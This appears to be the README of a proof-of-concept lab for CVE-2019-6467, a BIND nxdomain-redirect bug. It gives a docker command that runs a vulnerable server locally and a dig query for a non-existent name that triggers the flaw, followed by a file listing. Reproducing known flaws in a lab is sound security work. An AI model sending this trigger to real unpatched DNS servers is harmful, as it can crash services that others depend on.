CVE-2019-6467 (BIND nxdomain-redirect)# CVE-2019-6467
BIND nxdomain-redirect
For educational purposes only

## Run
```
$ docker run --rm --name cve-2019-6467 -it -p 53:53/udp knqyf263/cve-2019-6467
```
## Exploit
Normal query
```
$ dig @127.0.0.1 nxdomain.example.com
```
`nxdomain` can be replaced by anything that means non-existent domain name. (e.g. foobar.example.com)
## Reference
- https://ftp.isc.org/isc/bind/9.12.4-P1/RELEASE-NOTES-bind-9.12.4-P1.html
- https://ftp.isc.org/isc/bind9/9.14.1/RELEASE-NOTES-bind-9.14.1.html
[4.0K] /data/pocs/ec74838cc68955dcde887760735ddd0c8a2256db
├── [4.0K] contents
│ ├── [ 655] example.com.zone
│ ├── [ 37] named
│ └── [1.9K] named.conf
├── [1.8K] Dockerfile
├── [4.0K] imgs
│ └── [1.5M] cve-2019-6467.gif
├── [1.0K] LICENSE
└── [ 534] README.md
2 directories, 7 files